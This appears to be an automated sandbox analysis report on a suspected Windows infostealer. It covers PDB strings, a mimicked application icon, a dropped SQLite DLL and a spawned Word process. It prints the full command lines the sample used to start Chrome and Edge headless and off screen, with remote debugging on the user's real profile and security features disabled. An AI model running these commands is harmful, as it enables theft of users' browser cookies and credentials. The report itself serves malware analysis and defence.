      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.IO.Compression.ni.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: StL9joVVcT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: StL9joVVcT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: StL9joVVcT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: StL9joVVcT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: StL9joVVcT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: StL9joVVcT.exeStatic PE information: section name: .managed
      Source: StL9joVVcT.exeStatic PE information: section name: hydrated
      Source: e_sqlite3.dll.0.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9445CC82 push rbx; retn 000Ah0_2_00007FFD9445CC89
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile created: C:\Users\user\Desktop\e_sqlite3.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Icon mismatch, binary includes an icon from a different legit application in order to fool users
      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (28).png
      Source: C:\Users\user\Desktop\StL9joVVcT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeMemory allocated: 1F4E7BD0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944DBE70 GetSystemInfo,0_2_00007FFD944DBE70
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.man
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.manh~
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.manh~
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.manh~
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.man
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC050000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.man
      Source: StL9joVVcT.exe, 00000000.00000002.2446112346.000001F4E7CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94509AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFD94509AC0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944FB728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFD944FB728
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94509AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFD94509AC0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9478 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
